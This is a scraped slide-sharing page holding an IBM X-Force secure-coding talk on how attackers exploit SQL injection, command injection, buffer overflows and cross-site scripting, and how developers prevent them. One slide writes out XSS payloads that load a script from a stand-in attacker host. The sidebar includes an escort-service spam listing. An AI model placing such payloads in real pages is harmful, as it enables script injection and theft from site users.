Accelerating SOC Transformation with IBM Resilient and Carbon BlackAccelerating SOC Transformation with IBM Resilient and Carbon Black
Accelerating SOC Transformation with IBM Resilient and Carbon Black
 
How to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
How to Build a Faster, Laser-Sharp SOC with Intelligent OrchestrationHow to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
How to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
 
Are You Ready to Move Your IAM to the Cloud?
Are You Ready to Move Your IAM to the Cloud?Are You Ready to Move Your IAM to the Cloud?
Are You Ready to Move Your IAM to the Cloud?
 
Orchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
Orchestrate Your Security Defenses to Optimize the Impact of Threat IntelligenceOrchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
Orchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
 
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
 
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
 
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
 
WannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowWannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do Now
 
How to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security OperationsHow to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security Operations
 
IBM QRadar UBA
IBM QRadar UBA IBM QRadar UBA
IBM QRadar UBA
 
Mobile Vision 2020
Mobile Vision 2020Mobile Vision 2020
Mobile Vision 2020
 
Retail Mobility, Productivity and Security
Retail Mobility, Productivity and SecurityRetail Mobility, Productivity and Security
Retail Mobility, Productivity and Security
 
Close the Loop on Incident Response
Close the Loop on Incident ResponseClose the Loop on Incident Response
Close the Loop on Incident Response
 
Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats
 

Recently uploaded

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxRemote DBA Services
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Orbitshub
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Zilliz
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 

Recently uploaded (20)

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 

Uncover What's Inside the Mind of a Hacker

  • 1. Inside the Mind of a Hacker PAUL IONESCU, IBM X-FORCE ETHICAL HACKING TEAM
  • 2. The Price of a Security Bug INTRODUCTION
  • 3. 3 IBM Security Functionality vs. Security • As developers we want to create highly functional software unrestricted by the constraints of compliance standards and tedious business processes. • Product security is incorrectly perceived to be a burden on agile software development. • Security measures are often an afterthought. Something you have to do not something you want to do. High Security Low Security High Functionality Low Functionality
  • 4. 4 IBM Security Developing Secure and Highly Functional Products is Possible • If done early in the development lifecycle security is not hard or costly or conflicting with functionality. • This can be achieved by educating developers about threats. High Security Low Security High Functionality Low Functionality
  • 5. 5 IBM Security What is a 0-day? • A zero day is an unpublished security bug that has become known by a malicious party • Commonly found in widely used software
  • 6. 6 IBM Security Meet The Hackers Who Sell Spies The Tools To Crack Your PC Vupen’s chief executive and lead hacker, Chaouki Bekrar, says his company never had any intention of telling Google its secret techniques—certainly not for $60,000 in chump change.” ANDY GREENBERG, FORBES The Security Vulnerability Business • VUPEN – specializing in selling zero-days to the highest bidder • Refused Pwn2Own $60k prize because the zero day was worth more undisclosed
  • 7. 7 IBM Security Bug Poaching • As uncovered recently by IBM X-Force, web application flaws used in Ransomware style attacks. • 30 enterprise organizations targeted last year. • Attackers find and exploit website vulnerabilities. • SQL Injection main method of attack. • Once they obtain sensitive data attackers store it on a cloud service • An email is sent to the organization that links to the data as proof that the attacker has penetrated the network. • Attackers ask for large payments, $30k+ to reveal the flaws
  • 8. 8 IBM Security Types of Hackers • White-hat hackers ̶ abide by the rules of responsible disclosure ̶ notify companies about vulnerabilities before making them public ̶ they don’t require any other reward than recognition for identifying the issue ̶ also referred to as ethical hackers • Gray-hat hackers ̶ operate at the boundary of the law ̶ may be selling zero-day vulnerabilities to the bad guys or governments • Black-hat hackers ̶ they are the cybercriminals ̶ use zero-days to break into systems and steal data.
  • 9. 9 IBM Security What would a Hacker do? • Understanding common programming flaws can help developers prevent security issues • Getting into the hacker mindset allows identifying abuse cases • Implement software defenses while the software is written, reducing cost and potentially avoiding thousands of dollars in damages • You can cost the black hat and grey hats lots of money because they won’t have 0-days to sell!
  • 10. 10 IBM Security The Top Programming Flaws • Two highly used lists: OWASP Top 10 and MITRE (SANS) Top 25. • The MITRE Top 25 focuses on software mistakes. # CWE Name 1 CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') 2 CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') 3 CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') 4 CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
  • 12. 12 IBM Security The 15 worst data security breaches of the 21st Century 134 million credit cards exposed through SQL injection to install spyware on Heartland's data systems” TAYLOR ARMERDING, WWW.CSOONLINE.COM The Worst Data Breach of the 21st Century • In comparison the OPM hack was 21.5 million records • In 2012 SQLi responsible for more than half of all data breaches where the attack type has been disclosed according to IBM X-Force
  • 13. 13 IBM Security • User input is concatenated into a database query • Attacker can manipulate the query practically injecting SQL code and altering the functionality of the application • Attackers can even execute OS commands What is the programming flaw?
  • 14. 14 IBM Security • Java Prepared Statement example, removing the need for concatenation Preventing SQL Injection with Parameterized Statements
  • 15. 15 IBM Security • Many user-provided parameters only need to be alphanumeric • Input Validation whitelisting – alphanumeric by default, special characters by exception • This reduces the attack surface for many types of attacks not only SQL Injection • Implement an input validation framework Adding Input Validation to Prevent Injection
  • 17. 17 IBM Security Web attacks build on Shellshock bug One group used their Shellshock botnet to bombard machines run by Akamai with huge amounts of junk data to try to knock them offline. WWW.BBC.COM The Famous 0-Day • The 2014 Shellshock bug affected millions of servers around the world • It has it’s own logo and Wikipedia article.
  • 18. 18 IBM Security • The software concatenates or substitutes user input in a shell command. • The example below is from the recently disclosed “ImageTragik” bug • The %M part is substituted with a user-provided link. If a graphics file contains a link like this: • The software executes: What is the programming flaw?
  • 19. 19 IBM Security • Use Input Validation • Use parameterized functions where user input is being passed as parameters rather than one full command Preventing Command Injection Vulnerable Using a Parameterized Function
  • 21. 21 IBM Security • A contest held during the CanSecWest security conference. • Payouts topped $500,000 in 2014, with over a dozen new vulnerabilities found in Adobe Reader, Adobe Flash Player, Internet Explorer 11, Google Chrome and Mozilla Firefox • Many the zero-days disclosed at Pwn2Own are memory flaws — for example, CVE- 2012-1876, which is a buffer overflow in Internet Explorer, or CVE-2014-1303, a buffer overflow in Apple Safari. • Using such a vulnerability gives the attacker complete control over the victim’s machine. • For these reason memory flaws found in common software are extremely valuable on the black market. Pwn2Own
  • 22. 22 IBM Security Chinese Hackers Compromised Forbes.com Using IE, Flash Zero Days Chinese APT group uses IE, Flash zero days to compromise Forbes.com CHRIS BROOK, WWW.THREATPOST.COM Using Software Flaws in Cyber Espionage
  • 23. 23 IBM Security • Buffer Overflow is caused by improper memory management in C/C++ code • Example simple C program that validates a password • The code does not perform any validation on the length of the user input and does not bother ensuring that sufficient memory was allocated to store the data coming from the user What is the programming flaw?
  • 24. 24 IBM Security • The table below shows the memory representation for our vulnerable program, where 0 stands for the null character • If the user enters more than 16 “A” characters in the verification password, it will override the information stored at the 0x0111 address Overflowing the buffer
  • 25. 25 IBM Security • The attacker could overwrite the section in the memory that holds instructions, causing the execution of arbitrary code as shown in the simplistic representation below. Overflowing the program instructions
  • 26. 26 IBM Security • Use safe functions. For example fgets (…) allows you to limit the size of the input; fgets (userPass, 16, stdin) resolves the problem. • Ensure that the size of the input matches the size of the allocated memory. • Avoid employing user input as format string arguments. This can lead to another memory flaw: format string injection. • Be careful both when allocating memory and when releasing memory. Use-after-free is another type of memory flaw where the program keeps a reference to a location of the memory. Data at that location can be arbitrarily modified. • Use safe compiler flags. Such flags enable operating system defenses that make the insertion of arbitrary commands very difficult. For example, Address Space Layout Randomization is a Windows protection mechanism. Protecting From Memory Attacks
  • 28. 28 IBM Security Earlier today we were informed of a malicious site that was spreading links to StalkDaily.com on Twitter without user consent via a cross-site scripting vulnerability.” TWITTER COMMUNIQUE, APR 11,2009 The XSS Worm • Malicious Cross-Site Scripting (XSS) script would spread itself from user to user by modifying each user’s profile • Other social networking sites notably affected by XSS worms. Samy worm affected 1 million MySpace users in 2005 • Attack also commonly used to spoof websites and steal passwords. Major online retailers targeted.
  • 29. 29 IBM Security • XSS occurs when the web page inserts user input in an unsafe context • Example unsafe contexts ̶ During server side page generation: User name: <%=request.getParameter(“userName”)%> User name: <script src=“https://evil.com/attack.js”></script> ̶ During server side page generation in a JavaScript attribute: <body onload=“loadProfile(<%=request.getParameter(‘userid’)%>’’)”> <body onload=“loadProfile(1);eval("var a=document.createElement("script");a.src="https://evil.com/attack.js";document.bod y.appendChild(a);")”> ̶ During server side page generation in a JavaScript snippet: <script>loadProfile(<%=request.getParameter(‘userid’)%></script>”> ̶ Dynamic updates of innerHtml element attribute: userNameDiv.innerHtml = user.Name; • Due to the many areas that can be impacted by XSS it is difficult to defend and to miss. What is the programming flaw?
  • 30. 30 IBM Security • HtmlEncode user input before introducing it into unsafe context. • Dynamic page updates should update the innerText / contentText attribute of html nodes • Enforcing request token checks can prevent reflected cross-site scripting because the page will expire. It will also prevent • Use secure headers: X-XSS-Protection: 1; mode=block – Enforces the browser XSS filter Content-Security-Policy: script-src ‘self’ – Prevents loading external scripts Protecting From Web Page Attacks
  • 31. Catching Software Flaws DEFENDING AGAINST THE HACKERS
  • 32. 32 IBM Security • AppScan is an application security scanner • Tooling available both as a cloud service and installable • Interacts with the application and conducts automated attacks • In the screenshot you can see a scan of a server vulnerable to SQL Injection and OS Command Injection Catching SQL Injection and Command Injection with Dynamic Analysis
  • 33. 33 IBM Security • AppScan Source is a Static Analysis tool also available as a cloud service. • It examines the program code to identify security issues. • In the screenshot you can see a scan of the vulnerable sample program presented earlier Catching Buffer Overflow with Static Analysis
  • 34. ibm.com/security securityintelligence.com xforce.ibmcloud.com @ibmsecurity youtube/user/ibmsecuritysolutions © Copyright IBM Corporation 2016. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and / or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others. Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed, misappropriated or misused or can result in damage to or misuse of your systems, including for use in attacks on others. No IT system or product should be considered completely secure and no single product, service or security measure can be completely effective in preventing improper use or access. IBM systems, products and services are designed to be part of a lawful, comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT ANYSYSTEMS, PRODUCTS OR SERVICES ARE IMMUNE FROM, OR WILL MAKE YOUR ENTERPRISE IMMUNE FROM, THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY. FOLLOW US ON: THANK YOU